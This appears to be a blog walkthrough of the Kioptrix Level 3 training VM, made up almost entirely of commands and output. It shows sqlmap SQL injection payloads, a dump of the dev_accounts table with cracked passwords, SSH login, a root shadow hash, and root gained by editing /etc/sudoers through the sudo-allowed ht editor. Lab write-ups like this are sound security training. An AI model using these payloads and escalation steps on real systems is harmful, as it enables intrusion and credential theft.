sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201606170a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 03:32:50

[03:32:50] [INFO] testing connection to the target URL
[03:32:51] [INFO] heuristics detected web page charset 'ISO-8859-2'
[03:32:51] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[03:32:51] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[03:32:51] [INFO] testing if the target URL is stable
[03:32:52] [INFO] target URL is stable
[03:32:52] [INFO] heuristics detected web page charset 'ascii'
[03:32:52] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[03:32:52] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[03:32:52] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[03:33:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:33:11] [WARNING] reflective value(s) found and filtering out
[03:33:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[03:33:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[03:33:14] [INFO] GET parameter 'id' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
[03:33:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[03:33:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[03:33:14] [INFO] testing 'MySQL inline queries'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:33:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[03:33:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[03:33:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[03:33:24] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
[03:33:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:33:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:33:25] [INFO] target URL appears to be UNION injectable with 6 columns
[03:33:25] [WARNING] combined UNION/error-based SQL injection case found on column 2. sqlmap will try to find another column with better characteristics
[03:33:25] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[03:33:25] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-9800 OR 6056=6056#

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -
---
[03:33:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[03:33:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[03:33:43] [INFO] fetching current database
[03:33:43] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[03:33:43] [INFO] the SQL query used returns 3 entries
[03:33:43] [INFO] the SQL query used returns 3 entries
[03:33:43] [INFO] retrieved: id
[03:33:43] [INFO] retrieved: int(10)
[03:33:43] [INFO] retrieved: username
[03:33:43] [INFO] retrieved: varchar(50)
[03:33:43] [INFO] retrieved: password
[03:33:43] [INFO] retrieved: varchar(50)
[03:33:43] [INFO] fetching entries for table 'dev_accounts' in database 'gallery'
[03:33:43] [INFO] the SQL query used returns 2 entries
[03:33:44] [INFO] retrieved: "1","0d3eccfb887aabd50f243b3f155c0f85","dreg"
[03:33:44] [WARNING] automatically patching output having last char trimmed
[03:33:44] [INFO] retrieved: "2","5badcaf789d3d1d09794d8f021f40f0e","loneferret"
[03:33:44] [INFO] analyzing table dump for possible password hashes
[03:33:44] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[03:33:56] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> /usr/share/wordlists/rockyou.txt.gz
[03:34:19] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[03:34:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[03:34:26] [INFO] starting 2 processes
[03:34:27] [INFO] cracked password 'Mast3r' for user 'dreg'
[03:34:30] [INFO] cracked password 'starwars' for user 'loneferret'
[03:34:31] [INFO] postprocessing table dump
Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username | password |
+----+------------+---------------------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+

[03:34:31] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[03:34:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 21 times
[03:34:31] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 03:34:31

ssh loneferret@kioptrix3.com
loneferret@kioptrix3.com's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$

sudo su
[sudo] password for loneferret:
Sorry, user loneferret is not allowed to execute '/bin/su' as root on Kioptrix3.

export TERM=xterm
sudo ht

Shadow:

root:$1$QAKvVJey$6rRkAMGKq1u62yfDaenUr1:15082:0:99999:7:::

Edit sudoers

# User privilege specification

│root ALL=(ALL) ALL

│loneferret ALL=(ALL) ALL

loneferret@Kioptrix3:/usr/local/bin$ sudo ht /etc/sudoers

loneferret@Kioptrix3:/usr/local/bin$ sudo su

[sudo] password for loneferret:

root@Kioptrix3:/usr/local/bin# whoami

root

root@Kioptrix3:/usr/local/bin#

root@Kioptrix3:/usr/local/bin# cd /root

root@Kioptrix3:~# ls

Congrats.txt ht-2.0.18

root@Kioptrix3:~# cat Congrats.txt

Good for you for getting here.

Regardless of the matter (staying within the spirit of the game of course)

you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are

nice. Helps workout that information gathering part, but sometimes we

need to get our hands dirty in other things as well.

Again, these VMs are beginner and not intented for everyone.

Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)

fun in the process.

I hope you enjoyed this third challenge.

Steven McElrea

aka loneferret

http://www.kioptrix.com

Credit needs to be given to the creators of the gallery webapp and CMS used

for the building of the Kioptrix VM3 site.

Main page CMS:

http://www.lotuscms.org

Gallery application:

Gallarific 2.1 - Free Version released October 10, 2009

http://www.gallarific.com

Vulnerable version of this application can be downloaded

from the Exploit-DB website:

http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:

http://hte.sourceforge.net/downloads.html

And the vulnerable version on Exploit-DB here:

http://www.exploit-db.com/exploits/17083/

Also, all pictures were taken from Google Images, so being part of the

public domain I used them.

Best Regards,
Yuriy Stanchev/URIX

Pages

Tuesday, 16 August 2016

Kioptrix Level 3

About Me

Total Pageviews